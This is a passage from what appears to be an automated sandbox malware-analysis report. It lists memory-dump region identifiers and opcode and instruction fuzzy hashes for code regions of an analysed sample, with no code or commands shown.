                             • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                            • Instruction ID: 0050703fb6cc60b2e844740f8eb001ead4b7fda69a82ad27b7413b4a9b1b3467
                            • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                            • Instruction Fuzzy Hash: DC027874E006588FCF26CFA8C4905EDBBB6FF89310F548159E889BB355D730AA91CB90
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                            • Instruction ID: b5b5976fed763aa9b03a721c2dfdfb9f43c68cffc52102f6582b6d7eb47e9786
                            • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                            • Instruction Fuzzy Hash: 5B02F075E006198FCF15CF98C8809ADB7B6FF88350F258169E84ABB355D731AA91CF90
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                            • Instruction ID: 48012ba53514c2472d342683089786b7793da56470083b47d716d89dc3a20d8f
                            • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                            • Instruction Fuzzy Hash: 09C16D76E29B914BD713873DD8422A5F395AFE7294F09D72FFCE472942EB2096818204
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                            • Instruction ID: f974c4f29fa968f5a5ef2386bc29709023feeb36c94f55887ef9685a55a08454
                            • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                            • Instruction Fuzzy Hash: F2B12436E0529A9FCB21CB64C6503EDFFB2AF5B314F19919AD4447F282DB346981CB90
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                            • Instruction ID: 76cb89e2f1ab802a88fd26f3f054d268a338091e84807979a469fa51c8cccba6
                            • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                            • Instruction Fuzzy Hash: D7D14770600B40CFD725CF29C494BA7B7E0BB5A304F18992ED89A9BB52D736F845CB51
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                            • Instruction ID: 8abe7e06d491cbdd5b3353890f821007c07e68f86b7582c2e844147cf4a5b1b8
                            • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                            • Instruction Fuzzy Hash: 69D13DB010C3908FD714CF15C4A476BBFE0AF95708F18999EE4D92B391D7BA8948DB92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                            • Instruction ID: 562edc3854048f5b6d44a3f84fa0e5649ff7e770a2fcd77422291543369d6545
                            • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                            • Instruction Fuzzy Hash: 5BB17F72A083515BD308CF25C89176BF7E2EFC8310F5AC93EB899A7291D774D9419B82
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                            • Instruction ID: e5080a486ea6e99fab71d49c0706b221c5a53dc273cd166929c469e67ad7e1a6
                            • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                            • Instruction Fuzzy Hash: 1BB1A172E083115BD308CF25C89176BF7E2EFC8310F5AC93EE89997291D778D9459A82
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                            • Instruction ID: a98674dba2fef9a0353bf0b01aa7eeaf05033acce843fe73f6fd3d16f3649cb5
                            • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                            • Instruction Fuzzy Hash: 2EB10671A097118FD706EE3DC481215F7E1AFE6380F51D72EE9A9B7662EB31E8818740
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                            • Instruction ID: 61ed099742020e4c1b1271f0d48eb2733cbf09b36cc3b2171f0aec9c2c491f9b
                            • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                            • Instruction Fuzzy Hash: 3C91BD71B002118BDF15DEA8DC80BFBB3A0AF55314F59656CEA18BB292D332DD05C7A2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                            • Instruction ID: b0b5879d94771f850aee1a99da20d94f563be0d3d8bb37e4ddbb31a59cf9aae6
                            • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                            • Instruction Fuzzy Hash: 53B14C325106099FD719CF28C58AFA47BE0FF45368F25965CE899DF2A2C336D992CB40
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                            • Instruction ID: 8141ffb3cc5017d10e26f6d28993f61586254b8cab44d4fcd59d12551a1e7657
                            • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                            • Instruction Fuzzy Hash: F8C15A75A0471A8FC711DF28C08045AB3F2FF88350F258A6DE8999B721D731E996CF81
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                            • Instruction ID: d84c473e2af3c78dcaa31c3b0363e24781cf55b09cd4a25390e1b545407ac9ee
                            • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                            • Instruction Fuzzy Hash: 44916A309287905AEB168B3CCC427AAB794FFEB350F10D31AF98976891FB75D5818340
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
